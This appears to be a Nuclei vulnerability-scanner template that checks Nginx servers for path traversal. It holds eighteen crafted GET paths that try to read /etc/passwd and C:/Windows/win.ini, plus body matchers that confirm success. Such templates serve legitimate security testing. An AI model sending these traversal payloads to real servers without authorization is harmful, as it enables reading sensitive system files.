id: nginx-path-traversal

info:
  name: Nginx Server - Local File Inclusion
  author: p0ch4t,reewardius
  severity: high
  description: Nginx server is vulnerable to local file inclusion.
  reference:
    - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
    - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
    - https://github.com/stark0de/nginxpwner
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: lfi,lfr,nginx,generic
  
http:
  - method: GET
    path:
      - "{{BaseURL}}/#/../../../../../../../C:/Windows/win.ini"
      - "{{BaseURL}}/#/../../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../a/../../../C:/Windows/win.ini"
      - "{{BaseURL}}/../../../../a/../../../etc/passwd"
      - "{{BaseURL}}/..;/..;/C:/Windows/win.ini"
      - "{{BaseURL}}/..;/..;/etc/passwd"
      - "{{BaseURL}}/////..;/..;/C:/Windows/win.ini"
      - "{{BaseURL}}/////..;/..;/etc/passwd"
      - "{{BaseURL}}//////////////////../../../../../../../../etc/passwd"
      - "{{BaseURL}}///////////////////../../../../../../C:/Windows/win.ini"
      - "{{BaseURL}}///////////////////etc/passwd"
      - "{{BaseURL}}/;/..;/..;/C:/Windows/win.ini"
      - "{{BaseURL}}/;/..;/..;/etc/passwd"
      - "{{BaseURL}}/?../../../../../../../C:/Windows/win.ini"
      - "{{BaseURL}}/?../../../../../../../etc/passwd"
      - "{{BaseURL}}/?/../../../../../../../C:/Windows/win.ini"
      - "{{BaseURL}}/?/../../../../../../../etc/passwd"
      - "{{BaseURL}}/assets/css///////../../../../../../../../etc/passwd"
      
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          
      - type: word
        part: body
        words:
          - "bit app support"
          - "[fonts]"
          - "[extensions]"
          - "[mci extensions]"
        condition: or